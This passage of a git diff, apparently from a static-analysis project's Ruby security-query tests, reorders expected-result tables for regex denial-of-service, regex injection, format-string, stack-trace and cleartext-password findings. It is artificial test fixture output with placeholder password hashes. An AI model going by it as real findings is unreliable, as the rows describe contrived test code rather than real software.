| lib/index.rb:4:22:4:23 | a+ | regular expression | lib/index.rb:2:11:2:11 | x | library input | +| lib/index.rb:9:15:9:28 | call to match | lib/index.rb:8:13:8:13 | x | lib/index.rb:9:15:9:15 | x | This $@ that depends on a $@ may run slow on strings with many repetitions of 'a'. | lib/index.rb:9:24:9:25 | a+ | regular expression | lib/index.rb:8:13:8:13 | x | library input | +| lib/index.rb:11:16:11:276 | call to match | lib/index.rb:8:13:8:13 | x | lib/index.rb:11:16:11:16 | x | This $@ that depends on a $@ may run slow on strings starting with 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC' and with many repetitions of 'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC'. | lib/index.rb:11:271:11:272 | .* | regular expression | lib/index.rb:8:13:8:13 | x | library input | diff --git a/ruby/ql/test/query-tests/security/cwe-1333-regexp-injection/RegExpInjection.expected b/ruby/ql/test/query-tests/security/cwe-1333-regexp-injection/RegExpInjection.expected index 6a4c79e1fa4f..13643e2c07e5 100644 --- a/ruby/ql/test/query-tests/security/cwe-1333-regexp-injection/RegExpInjection.expected +++ b/ruby/ql/test/query-tests/security/cwe-1333-regexp-injection/RegExpInjection.expected 
@@ -1,9 +1,3 @@ -#select -| RegExpInjection.rb:5:13:5:21 | /#{...}/ | RegExpInjection.rb:4:12:4:17 | call to params | RegExpInjection.rb:5:13:5:21 | /#{...}/ | This regular expression depends on a $@. | RegExpInjection.rb:4:12:4:17 | call to params | user-provided value | -| RegExpInjection.rb:11:13:11:27 | /foo#{...}bar/ | RegExpInjection.rb:10:12:10:17 | call to params | RegExpInjection.rb:11:13:11:27 | /foo#{...}bar/ | This regular expression depends on a $@. | RegExpInjection.rb:10:12:10:17 | call to params | user-provided value | -| RegExpInjection.rb:17:24:17:27 | name | RegExpInjection.rb:16:12:16:17 | call to params | RegExpInjection.rb:17:24:17:27 | name | This regular expression depends on a $@. | RegExpInjection.rb:16:12:16:17 | call to params | user-provided value | -| RegExpInjection.rb:23:24:23:33 | ... + ... | RegExpInjection.rb:22:12:22:17 | call to params | RegExpInjection.rb:23:24:23:33 | ... + ... | This regular expression depends on a $@. | RegExpInjection.rb:22:12:22:17 | call to params | user-provided value | -| RegExpInjection.rb:55:28:55:37 | ... + ... | RegExpInjection.rb:54:12:54:17 | call to params | RegExpInjection.rb:55:28:55:37 | ... + ... | This regular expression depends on a $@. | RegExpInjection.rb:54:12:54:17 | call to params | user-provided value | edges | RegExpInjection.rb:4:5:4:8 | name | RegExpInjection.rb:5:13:5:21 | /#{...}/ | provenance | AdditionalTaintStep | | RegExpInjection.rb:4:12:4:17 | call to params | RegExpInjection.rb:4:12:4:24 | ...[...] | provenance | | 
@@ -48,3 +42,9 @@ nodes | RegExpInjection.rb:55:28:55:37 | ... + ... | semmle.label | ... + ... | | RegExpInjection.rb:55:34:55:37 | name | semmle.label | name | subpaths +#select +| RegExpInjection.rb:5:13:5:21 | /#{...}/ | RegExpInjection.rb:4:12:4:17 | call to params | RegExpInjection.rb:5:13:5:21 | /#{...}/ | This regular expression depends on a $@. | RegExpInjection.rb:4:12:4:17 | call to params | user-provided value | +| RegExpInjection.rb:11:13:11:27 | /foo#{...}bar/ | RegExpInjection.rb:10:12:10:17 | call to params | RegExpInjection.rb:11:13:11:27 | /foo#{...}bar/ | This regular expression depends on a $@. | RegExpInjection.rb:10:12:10:17 | call to params | user-provided value | +| RegExpInjection.rb:17:24:17:27 | name | RegExpInjection.rb:16:12:16:17 | call to params | RegExpInjection.rb:17:24:17:27 | name | This regular expression depends on a $@. | RegExpInjection.rb:16:12:16:17 | call to params | user-provided value | +| RegExpInjection.rb:23:24:23:33 | ... + ... | RegExpInjection.rb:22:12:22:17 | call to params | RegExpInjection.rb:23:24:23:33 | ... + ... | This regular expression depends on a $@. | RegExpInjection.rb:22:12:22:17 | call to params | user-provided value | +| RegExpInjection.rb:55:28:55:37 | ... + ... | RegExpInjection.rb:54:12:54:17 | call to params | RegExpInjection.rb:55:28:55:37 | ... + ... | This regular expression depends on a $@. | RegExpInjection.rb:54:12:54:17 | call to params | user-provided value | diff --git a/ruby/ql/test/query-tests/security/cwe-134/TaintedFormatString.expected b/ruby/ql/test/query-tests/security/cwe-134/TaintedFormatString.expected index 58907596bd7d..104b9d3ada07 100644 --- a/ruby/ql/test/query-tests/security/cwe-134/TaintedFormatString.expected +++ b/ruby/ql/test/query-tests/security/cwe-134/TaintedFormatString.expected 
@@ -1,17 +1,3 @@ -#select -| tainted_format_string.rb:4:12:4:26 | ...[...] | tainted_format_string.rb:4:12:4:17 | call to params | tainted_format_string.rb:4:12:4:26 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:4:12:4:17 | call to params | user-provided value | -| tainted_format_string.rb:5:19:5:33 | ...[...] | tainted_format_string.rb:5:19:5:24 | call to params | tainted_format_string.rb:5:19:5:33 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:5:19:5:24 | call to params | user-provided value | -| tainted_format_string.rb:10:23:10:37 | ...[...] | tainted_format_string.rb:10:23:10:28 | call to params | tainted_format_string.rb:10:23:10:37 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:10:23:10:28 | call to params | user-provided value | -| tainted_format_string.rb:11:30:11:44 | ...[...] | tainted_format_string.rb:11:30:11:35 | call to params | tainted_format_string.rb:11:30:11:44 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:11:30:11:35 | call to params | user-provided value | -| tainted_format_string.rb:18:23:18:37 | ...[...] | tainted_format_string.rb:18:23:18:28 | call to params | tainted_format_string.rb:18:23:18:37 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:18:23:18:28 | call to params | user-provided value | -| tainted_format_string.rb:19:30:19:44 | ...[...] | tainted_format_string.rb:19:30:19:35 | call to params | tainted_format_string.rb:19:30:19:44 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:19:30:19:35 | call to params | user-provided value | -| tainted_format_string.rb:21:27:21:41 | ...[...] | tainted_format_string.rb:21:27:21:32 | call to params | tainted_format_string.rb:21:27:21:41 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:21:27:21:32 | call to params | user-provided value | -| tainted_format_string.rb:22:20:22:34 | ...[...] 
| tainted_format_string.rb:22:20:22:25 | call to params | tainted_format_string.rb:22:20:22:34 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:22:20:22:25 | call to params | user-provided value | -| tainted_format_string.rb:28:19:28:33 | ...[...] | tainted_format_string.rb:28:19:28:24 | call to params | tainted_format_string.rb:28:19:28:33 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:28:19:28:24 | call to params | user-provided value | -| tainted_format_string.rb:33:12:33:46 | ... + ... | tainted_format_string.rb:33:32:33:37 | call to params | tainted_format_string.rb:33:12:33:46 | ... + ... | Format string depends on a $@. | tainted_format_string.rb:33:32:33:37 | call to params | user-provided value | -| tainted_format_string.rb:36:12:36:46 | "A log message: #{...}" | tainted_format_string.rb:36:30:36:35 | call to params | tainted_format_string.rb:36:12:36:46 | "A log message: #{...}" | Format string depends on a $@. | tainted_format_string.rb:36:30:36:35 | call to params | user-provided value | -| tainted_format_string.rb:39:5:39:45 | "A log message #{...} %{foo}" | tainted_format_string.rb:39:22:39:27 | call to params | tainted_format_string.rb:39:5:39:45 | "A log message #{...} %{foo}" | Format string depends on a $@. | tainted_format_string.rb:39:22:39:27 | call to params | user-provided value | -| tainted_format_string.rb:42:5:42:43 | "A log message #{...} %08x" | tainted_format_string.rb:42:22:42:27 | call to params | tainted_format_string.rb:42:5:42:43 | "A log message #{...} %08x" | Format string depends on a $@. | tainted_format_string.rb:42:22:42:27 | call to params | user-provided value | edges | tainted_format_string.rb:4:12:4:17 | call to params | tainted_format_string.rb:4:12:4:26 | ...[...] | provenance | | | tainted_format_string.rb:5:19:5:24 | call to params | tainted_format_string.rb:5:19:5:33 | ...[...] | provenance | | 
@@ -62,3 +48,17 @@ nodes | tainted_format_string.rb:42:22:42:27 | call to params | semmle.label | call to params | | tainted_format_string.rb:42:22:42:36 | ...[...] | semmle.label | ...[...] | subpaths +#select +| tainted_format_string.rb:4:12:4:26 | ...[...] | tainted_format_string.rb:4:12:4:17 | call to params | tainted_format_string.rb:4:12:4:26 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:4:12:4:17 | call to params | user-provided value | +| tainted_format_string.rb:5:19:5:33 | ...[...] | tainted_format_string.rb:5:19:5:24 | call to params | tainted_format_string.rb:5:19:5:33 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:5:19:5:24 | call to params | user-provided value | +| tainted_format_string.rb:10:23:10:37 | ...[...] | tainted_format_string.rb:10:23:10:28 | call to params | tainted_format_string.rb:10:23:10:37 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:10:23:10:28 | call to params | user-provided value | +| tainted_format_string.rb:11:30:11:44 | ...[...] | tainted_format_string.rb:11:30:11:35 | call to params | tainted_format_string.rb:11:30:11:44 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:11:30:11:35 | call to params | user-provided value | +| tainted_format_string.rb:18:23:18:37 | ...[...] | tainted_format_string.rb:18:23:18:28 | call to params | tainted_format_string.rb:18:23:18:37 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:18:23:18:28 | call to params | user-provided value | +| tainted_format_string.rb:19:30:19:44 | ...[...] | tainted_format_string.rb:19:30:19:35 | call to params | tainted_format_string.rb:19:30:19:44 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:19:30:19:35 | call to params | user-provided value | +| tainted_format_string.rb:21:27:21:41 | ...[...] | tainted_format_string.rb:21:27:21:32 | call to params | tainted_format_string.rb:21:27:21:41 | ...[...] 
| Format string depends on a $@. | tainted_format_string.rb:21:27:21:32 | call to params | user-provided value | +| tainted_format_string.rb:22:20:22:34 | ...[...] | tainted_format_string.rb:22:20:22:25 | call to params | tainted_format_string.rb:22:20:22:34 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:22:20:22:25 | call to params | user-provided value | +| tainted_format_string.rb:28:19:28:33 | ...[...] | tainted_format_string.rb:28:19:28:24 | call to params | tainted_format_string.rb:28:19:28:33 | ...[...] | Format string depends on a $@. | tainted_format_string.rb:28:19:28:24 | call to params | user-provided value | +| tainted_format_string.rb:33:12:33:46 | ... + ... | tainted_format_string.rb:33:32:33:37 | call to params | tainted_format_string.rb:33:12:33:46 | ... + ... | Format string depends on a $@. | tainted_format_string.rb:33:32:33:37 | call to params | user-provided value | +| tainted_format_string.rb:36:12:36:46 | "A log message: #{...}" | tainted_format_string.rb:36:30:36:35 | call to params | tainted_format_string.rb:36:12:36:46 | "A log message: #{...}" | Format string depends on a $@. | tainted_format_string.rb:36:30:36:35 | call to params | user-provided value | +| tainted_format_string.rb:39:5:39:45 | "A log message #{...} %{foo}" | tainted_format_string.rb:39:22:39:27 | call to params | tainted_format_string.rb:39:5:39:45 | "A log message #{...} %{foo}" | Format string depends on a $@. | tainted_format_string.rb:39:22:39:27 | call to params | user-provided value | +| tainted_format_string.rb:42:5:42:43 | "A log message #{...} %08x" | tainted_format_string.rb:42:22:42:27 | call to params | tainted_format_string.rb:42:5:42:43 | "A log message #{...} %08x" | Format string depends on a $@. | tainted_format_string.rb:42:22:42:27 | call to params | user-provided value | 
diff --git a/ruby/ql/test/query-tests/security/cwe-209/StackTraceExposure.expected b/ruby/ql/test/query-tests/security/cwe-209/StackTraceExposure.expected index 24404e8f1a9f..00e0b4317de2 100644 --- a/ruby/ql/test/query-tests/security/cwe-209/StackTraceExposure.expected +++ b/ruby/ql/test/query-tests/security/cwe-209/StackTraceExposure.expected @@ -1,7 +1,3 @@ -#select -| StackTraceExposure.rb:6:18:6:28 | call to backtrace | StackTraceExposure.rb:6:18:6:28 | call to backtrace | StackTraceExposure.rb:6:18:6:28 | call to backtrace | $@ can be exposed to an external user. | StackTraceExposure.rb:6:18:6:28 | call to backtrace | Error information | -| StackTraceExposure.rb:12:18:12:19 | bt | StackTraceExposure.rb:11:10:11:17 | call to caller | StackTraceExposure.rb:12:18:12:19 | bt | $@ can be exposed to an external user. | StackTraceExposure.rb:11:10:11:17 | call to caller | Error information | -| StackTraceExposure.rb:18:18:18:28 | call to backtrace | StackTraceExposure.rb:18:18:18:28 | call to backtrace | StackTraceExposure.rb:18:18:18:28 | call to backtrace | $@ can be exposed to an external user. | StackTraceExposure.rb:18:18:18:28 | call to backtrace | Error information | edges | StackTraceExposure.rb:11:5:11:6 | bt | StackTraceExposure.rb:12:18:12:19 | bt | provenance | | | StackTraceExposure.rb:11:10:11:17 | call to caller | StackTraceExposure.rb:11:5:11:6 | bt | provenance | | 
@@ -12,3 +8,7 @@ nodes | StackTraceExposure.rb:12:18:12:19 | bt | semmle.label | bt | | StackTraceExposure.rb:18:18:18:28 | call to backtrace | semmle.label | call to backtrace | subpaths +#select +| StackTraceExposure.rb:6:18:6:28 | call to backtrace | StackTraceExposure.rb:6:18:6:28 | call to backtrace | StackTraceExposure.rb:6:18:6:28 | call to backtrace | $@ can be exposed to an external user. | StackTraceExposure.rb:6:18:6:28 | call to backtrace | Error information | +| StackTraceExposure.rb:12:18:12:19 | bt | StackTraceExposure.rb:11:10:11:17 | call to caller | StackTraceExposure.rb:12:18:12:19 | bt | $@ can be exposed to an external user. | StackTraceExposure.rb:11:10:11:17 | call to caller | Error information | +| StackTraceExposure.rb:18:18:18:28 | call to backtrace | StackTraceExposure.rb:18:18:18:28 | call to backtrace | StackTraceExposure.rb:18:18:18:28 | call to backtrace | $@ can be exposed to an external user. | StackTraceExposure.rb:18:18:18:28 | call to backtrace | Error information | diff --git a/ruby/ql/test/query-tests/security/cwe-312/CleartextLogging.expected b/ruby/ql/test/query-tests/security/cwe-312/CleartextLogging.expected index ae87773dd0e8..7c2d4d259e33 100644 --- a/ruby/ql/test/query-tests/security/cwe-312/CleartextLogging.expected +++ b/ruby/ql/test/query-tests/security/cwe-312/CleartextLogging.expected 
@@ -1,26 +1,3 @@ -#select -| logging.rb:6:20:6:27 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:6:20:6:27 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:8:21:8:28 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:8:21:8:28 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:10:21:10:28 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:10:21:10:28 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:12:21:12:28 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:12:21:12:28 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:14:23:14:30 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:14:23:14:30 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:16:20:16:27 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:16:20:16:27 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:19:33:19:40 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:19:33:19:40 | password | This logs sensitive data returned by $@ as clear text. 
| logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:21:44:21:51 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:21:44:21:51 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:23:33:23:40 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:23:33:23:40 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:26:18:26:34 | "pw: #{...}" | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:26:18:26:34 | "pw: #{...}" | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:28:26:28:33 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:28:26:28:33 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | -| logging.rb:38:20:38:34 | ...[...] | logging.rb:30:20:30:53 | "aec5058e61f7f122998b1a30ee2c66b6" : String | logging.rb:38:20:38:34 | ...[...] | This logs sensitive data returned by $@ as clear text. | logging.rb:30:20:30:53 | "aec5058e61f7f122998b1a30ee2c66b6" | a write to password | -| logging.rb:40:20:40:34 | ...[...] | logging.rb:34:19:34:52 | "beeda625d7306b45784d91ea0336e201" : String | logging.rb:40:20:40:34 | ...[...] | This logs sensitive data returned by $@ as clear text. | logging.rb:34:19:34:52 | "beeda625d7306b45784d91ea0336e201" | a write to password | -| logging.rb:42:20:42:34 | ...[...] | logging.rb:34:19:34:52 | "beeda625d7306b45784d91ea0336e201" : String | logging.rb:42:20:42:34 | ...[...] 
| This logs sensitive data returned by $@ as clear text. | logging.rb:34:19:34:52 | "beeda625d7306b45784d91ea0336e201" | a write to password | -| logging.rb:74:20:74:50 | password_masked_ineffective_sub | logging.rb:64:35:64:68 | "ca497451f5e883662fb1a37bc9ec7838" : String | logging.rb:74:20:74:50 | password_masked_ineffective_sub | This logs sensitive data returned by $@ as clear text. | logging.rb:64:35:64:68 | "ca497451f5e883662fb1a37bc9ec7838" | an assignment to password_masked_ineffective_sub | -| logging.rb:74:20:74:50 | password_masked_ineffective_sub | logging.rb:68:35:68:88 | call to sub | logging.rb:74:20:74:50 | password_masked_ineffective_sub | This logs sensitive data returned by $@ as clear text. | logging.rb:68:35:68:88 | call to sub | an assignment to password_masked_ineffective_sub | -| logging.rb:76:20:76:51 | password_masked_ineffective_gsub | logging.rb:66:36:66:69 | "a7e3747b19930d4f4b8181047194832f" : String | logging.rb:76:20:76:51 | password_masked_ineffective_gsub | This logs sensitive data returned by $@ as clear text. | logging.rb:66:36:66:69 | "a7e3747b19930d4f4b8181047194832f" | an assignment to password_masked_ineffective_gsub | -| logging.rb:76:20:76:51 | password_masked_ineffective_gsub | logging.rb:70:36:70:86 | call to gsub | logging.rb:76:20:76:51 | password_masked_ineffective_gsub | This logs sensitive data returned by $@ as clear text. | logging.rb:70:36:70:86 | call to gsub | an assignment to password_masked_ineffective_gsub | -| logging.rb:78:20:78:53 | password_masked_ineffective_sub_ex | logging.rb:65:38:65:71 | "ca497451f5e883662fb1a37bc9ec7838" : String | logging.rb:78:20:78:53 | password_masked_ineffective_sub_ex | This logs sensitive data returned by $@ as clear text. 
| logging.rb:65:38:65:71 | "ca497451f5e883662fb1a37bc9ec7838" | an assignment to password_masked_ineffective_sub_ex | -| logging.rb:80:20:80:54 | password_masked_ineffective_gsub_ex | logging.rb:67:39:67:72 | "a7e3747b19930d4f4b8181047194832f" : String | logging.rb:80:20:80:54 | password_masked_ineffective_gsub_ex | This logs sensitive data returned by $@ as clear text. | logging.rb:67:39:67:72 | "a7e3747b19930d4f4b8181047194832f" | an assignment to password_masked_ineffective_gsub_ex | -| logging.rb:84:15:84:22 | password | logging.rb:84:15:84:22 | password | logging.rb:84:15:84:22 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:84:15:84:22 | password | a parameter password | -| logging.rb:84:15:84:22 | password | logging.rb:87:16:87:49 | "65f2950df2f0e2c38d7ba2ccca767291" : String | logging.rb:84:15:84:22 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:87:16:87:49 | "65f2950df2f0e2c38d7ba2ccca767291" | an assignment to password_arg | edges | logging.rb:3:1:3:8 | password : String | logging.rb:6:20:6:27 | password | provenance | | | logging.rb:3:1:3:8 | password : String | logging.rb:8:21:8:28 | password | provenance | | 
@@ -112,3 +89,26 @@ nodes | logging.rb:87:16:87:49 | "65f2950df2f0e2c38d7ba2ccca767291" : String | semmle.label | "65f2950df2f0e2c38d7ba2ccca767291" : String | | logging.rb:88:5:88:16 | password_arg : String | semmle.label | password_arg : String | subpaths +#select +| logging.rb:6:20:6:27 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:6:20:6:27 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:8:21:8:28 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:8:21:8:28 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:10:21:10:28 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:10:21:10:28 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:12:21:12:28 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:12:21:12:28 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:14:23:14:30 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:14:23:14:30 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:16:20:16:27 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:16:20:16:27 | password | This logs sensitive data returned by $@ as clear text. 
| logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:19:33:19:40 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:19:33:19:40 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:21:44:21:51 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:21:44:21:51 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:23:33:23:40 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:23:33:23:40 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:26:18:26:34 | "pw: #{...}" | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:26:18:26:34 | "pw: #{...}" | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:28:26:28:33 | password | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" : String | logging.rb:28:26:28:33 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:3:12:3:45 | "043697b96909e03ca907599d6420555f" | an assignment to password | +| logging.rb:38:20:38:34 | ...[...] | logging.rb:30:20:30:53 | "aec5058e61f7f122998b1a30ee2c66b6" : String | logging.rb:38:20:38:34 | ...[...] | This logs sensitive data returned by $@ as clear text. | logging.rb:30:20:30:53 | "aec5058e61f7f122998b1a30ee2c66b6" | a write to password | +| logging.rb:40:20:40:34 | ...[...] | logging.rb:34:19:34:52 | "beeda625d7306b45784d91ea0336e201" : String | logging.rb:40:20:40:34 | ...[...] 
| This logs sensitive data returned by $@ as clear text. | logging.rb:34:19:34:52 | "beeda625d7306b45784d91ea0336e201" | a write to password | +| logging.rb:42:20:42:34 | ...[...] | logging.rb:34:19:34:52 | "beeda625d7306b45784d91ea0336e201" : String | logging.rb:42:20:42:34 | ...[...] | This logs sensitive data returned by $@ as clear text. | logging.rb:34:19:34:52 | "beeda625d7306b45784d91ea0336e201" | a write to password | +| logging.rb:74:20:74:50 | password_masked_ineffective_sub | logging.rb:64:35:64:68 | "ca497451f5e883662fb1a37bc9ec7838" : String | logging.rb:74:20:74:50 | password_masked_ineffective_sub | This logs sensitive data returned by $@ as clear text. | logging.rb:64:35:64:68 | "ca497451f5e883662fb1a37bc9ec7838" | an assignment to password_masked_ineffective_sub | +| logging.rb:74:20:74:50 | password_masked_ineffective_sub | logging.rb:68:35:68:88 | call to sub | logging.rb:74:20:74:50 | password_masked_ineffective_sub | This logs sensitive data returned by $@ as clear text. | logging.rb:68:35:68:88 | call to sub | an assignment to password_masked_ineffective_sub | +| logging.rb:76:20:76:51 | password_masked_ineffective_gsub | logging.rb:66:36:66:69 | "a7e3747b19930d4f4b8181047194832f" : String | logging.rb:76:20:76:51 | password_masked_ineffective_gsub | This logs sensitive data returned by $@ as clear text. | logging.rb:66:36:66:69 | "a7e3747b19930d4f4b8181047194832f" | an assignment to password_masked_ineffective_gsub | +| logging.rb:76:20:76:51 | password_masked_ineffective_gsub | logging.rb:70:36:70:86 | call to gsub | logging.rb:76:20:76:51 | password_masked_ineffective_gsub | This logs sensitive data returned by $@ as clear text. 
| logging.rb:70:36:70:86 | call to gsub | an assignment to password_masked_ineffective_gsub | +| logging.rb:78:20:78:53 | password_masked_ineffective_sub_ex | logging.rb:65:38:65:71 | "ca497451f5e883662fb1a37bc9ec7838" : String | logging.rb:78:20:78:53 | password_masked_ineffective_sub_ex | This logs sensitive data returned by $@ as clear text. | logging.rb:65:38:65:71 | "ca497451f5e883662fb1a37bc9ec7838" | an assignment to password_masked_ineffective_sub_ex | +| logging.rb:80:20:80:54 | password_masked_ineffective_gsub_ex | logging.rb:67:39:67:72 | "a7e3747b19930d4f4b8181047194832f" : String | logging.rb:80:20:80:54 | password_masked_ineffective_gsub_ex | This logs sensitive data returned by $@ as clear text. | logging.rb:67:39:67:72 | "a7e3747b19930d4f4b8181047194832f" | an assignment to password_masked_ineffective_gsub_ex | +| logging.rb:84:15:84:22 | password | logging.rb:84:15:84:22 | password | logging.rb:84:15:84:22 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:84:15:84:22 | password | a parameter password | +| logging.rb:84:15:84:22 | password | logging.rb:87:16:87:49 | "65f2950df2f0e2c38d7ba2ccca767291" : String | logging.rb:84:15:84:22 | password | This logs sensitive data returned by $@ as clear text. | logging.rb:87:16:87:49 | "65f2950df2f0e2c38d7ba2ccca767291" | an assignment to password_arg | diff --git a/ruby/ql/test/query-tests/security/cwe-312/CleartextStorage.expected b/ruby/ql/test/query-tests/security/cwe-312/CleartextStorage.expected index 76b6520fbdb1..2a1c5c564652 100644 --- a/ruby/ql/test/query-tests/security/cwe-312/CleartextStorage.expected +++ b/ruby/ql/test/query-tests/security/cwe-312/CleartextStorage.expected 
@@ -1,32 +1,3 @@ -#select -| app/controllers/users_controller.rb:5:39:5:50 | new_password | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" : String | app/controllers/users_controller.rb:5:39:5:50 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" | an assignment to new_password | -| app/controllers/users_controller.rb:7:41:7:52 | new_password | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" : String | app/controllers/users_controller.rb:7:41:7:52 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:3:20:3:53 | "043697b96909e03ca907599d6420555f" | an assignment to new_password | -| app/controllers/users_controller.rb:7:41:7:52 | new_password | app/controllers/users_controller.rb:7:41:7:52 | new_password | app/controllers/users_controller.rb:7:41:7:52 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:7:41:7:52 | new_password | a write to password | -| app/controllers/users_controller.rb:13:42:13:53 | new_password | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" : String | app/controllers/users_controller.rb:13:42:13:53 | new_password | This stores sensitive data returned by $@ as clear text. | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" | an assignment to new_password | -| app/controllers/users_controller.rb:15:49:15:60 | new_password | app/controllers/users_controller.rb:11:20:11:53 | "083c9e1da4cc0c2f5480bb4dbe6ff141" : String | app/controllers/users_controller.rb:15:49:15:60 | new_password | This stores sensitive data returned by $@ as clear text. 
